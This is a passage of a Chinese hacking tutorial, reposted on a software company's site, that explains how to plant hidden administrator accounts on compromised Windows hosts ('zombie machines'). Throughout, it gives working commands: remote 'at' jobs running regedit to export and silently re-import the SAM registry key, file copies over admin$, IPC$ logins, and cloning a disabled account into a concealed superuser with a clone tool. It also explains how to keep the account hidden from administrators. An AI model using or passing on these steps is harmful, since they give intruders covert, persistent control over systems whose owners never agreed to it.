向你介绍系统中多种隐藏超级用户的方法(2)
[时间:2010-5-20]  [文章来源:上海百络]  [责任编辑:master]
    4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值:

      at 13.50.97.238 12:55 c:\winntregedit.exe /e hacker.reg

      HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

      /e 是regedit.exe的参数,在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将“c:\winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起来。

      5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:

      copy 13.50.97.238admin$system32hacker.reg c:\hacker.reg

      修改的方法图形界中已经介绍过了,这里就不作介绍了。

      6、再将编辑好的hacker.reg拷回肉鸡上

      copy c:\hacker.reg 13.50.97.238admin$system32hacker1.reg

      7、查看肉鸡时间:net time 13.50.97.238 然后用at命令将用户hacker$删除:

      at 13.50.97.238 13:40 net user hacker$Content$nbsp;/del

      8、验证hacker$是否删除:用

      net use 13.50.97.238 /del 断开与肉鸡的连接。

      net use 13.50.97.238ipc$Content$nbsp;"1234" /user:"hacker$" 用帐户hacker$与肉鸡连接,不能连接说明已删除。

      9、再与肉鸡建立连接:net use 13.50.97.238ipc$Content$nbsp;"12345678" /user:"administrator"再取得肉鸡时间,用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:

      at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg

      regedit.exe的参数/s是指安静模式。

      10、再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。

      11、再验证用户hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。

      12、通过11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删的权限。

    三、如果肉鸡没有开3389终端服务,而我又不想用命令行,怎么办?

      这种情况下,你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能,你可以用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。

      是这里有两个前提:1、先用net use 肉鸡ipipc$Content$nbsp;"密码" /user:"超级用户名"来与远程主机建立连接以后,才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。

      2、远程主机必须开启远程注册表服务(没有开启的话,你也可以远程开启,因为你有超级用户的密码了)。

      四、利用被禁用的帐户建立隐藏的超级用户

      1、想办查看有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然了会禁用其它用户。在图形界面下,非常容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下,我还没有想到好的办法,只能在命令行下用命令:“net user 用户名”一个一个来查看用户是否被禁用。

      2.在这里,我们假设用户hacker被管理员禁用。首先,我先用小榕的超组用户克隆程序CA.exe,将被禁用的用户hacker 克隆成超级用户(克隆之后,被禁用的用户hacker就会自动被激活了): CA.EXE 肉鸡ip Administrator 超级用户密码 hacher hacher密码。

      3.如果你现在一个cmdshell,如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以,这时你只要输入命令:

      net user hacker /active:no

      这样用户hacker就被禁用了(至少表面上是这样的),当然你也可以将用户hacher换成其它的被禁用的用户。

      4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了,但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user 肉鸡ipipc$Content$nbsp;"hacker密码" /user:"hacker" 连一连看看。我可以告诉大家,经过我多次试验,次次都能成功,而且还是超级用户权限。

      5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式:at 肉鸡ip 时间 net user hacker /active:no

      6.原理:具体的高深的原理我也说不上来,我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会弹出一对话框,并禁止你继续禁用超级用户administrator,同样,因为在克隆时,hacker在注册表的“F”键被超级用户administrator在注册表的“F”键所替代,因而hacker就具有了超级用户的权限了,但是由于hacker在注册表内“C”健还是原来的“C”键,所以hacker还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用户hacker还是可以连接肉鸡,而且还具有超级用户的权限。具体我也说不明白,大家权且这么理解吧。

      五、注意的几点事项

      1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。

      2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。3、如在本机上试验时,最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份,因为本人做试验时,曾出现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。



    [关闭本页]
  关键词:  向你介绍系统中多种隐藏超级用户的方法(2)
首页 |  局域网监控软件使用说明 |  局域网管理软件用户问答 |  网络管理软件典型案例 |  百络网警用户论坛
Copyright © 2013-2016 NETBAI.COM 上海百络信息技术有限公司 版权所有 E-MAIL:netbai999@126.com
监控软件-征信网认证 监控软件-网警网络110 沪ICP备14015905号-1
监控软件-公安部检测报告 监控软件-360认证 监控软件-瑞星认证 监控软件-金山云安全中心网站安全检测 监控软件-江民安全认证 监控软件-卡巴斯基检测通过 监控软件-小红伞安全认证